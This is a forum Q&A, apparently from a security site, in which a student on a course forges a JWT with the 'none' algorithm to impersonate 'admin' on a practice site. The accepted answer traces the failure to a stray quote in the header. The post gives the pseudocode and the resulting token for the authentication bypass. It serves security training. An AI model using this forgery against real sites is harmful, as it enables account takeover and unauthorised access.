# Having problems with performing a JWT "none" algorithm attack

Tags: attacks, cookies, jwt

I'm taking a course where I must breach a site which uses 2015 version of JWT for authentication. They gave me the `test//test` login information and I must login with `admin`.

After I log in, I receive this token, and it's stored in my cookies:

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QifQ.vLVv9jMkXF8YTdkkbmWfWAB9teChPPJI6t4f8ejR-8I
```

I decoded it with [jwt.io](https://jwt.io) and got this header and payload:

```
{
  "alg": "HS256",
  "typ": "JWT"
}

{
  "username": "test"
}
```

So I changed the `alg` to `none` and the `username` to `admin` and used an empty string as a signature:

```
header = '{"alg":"none"","typ":"JWT"}'
payload = '{"username":"admin"}'
signature = ""
token = encodeBase64URL(header) + '.' + encodeBase64URL(payload) + '.' + encodeBase64URL(signature)
```

I got this token as a result:

```
eyJhbGciOiJub25lIiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.
```

I replaced my cookie with this one, and refreshed the page. But it's invalid or something because I got logged out instead of being identified as the `admin` user.

Why?

Comment: Sjoerd's answer is definitely something for you to address, but it's also worth asking: are you sure that this is the proper exploit to break in?

Comment: Yes, it is. And the typo was the problem :D

Answer (score 3, accepted):

You have a typo in your header:

```
header = '{"alg":"none"","typ":"JWT"}'
```

`none` has two quotes at the end.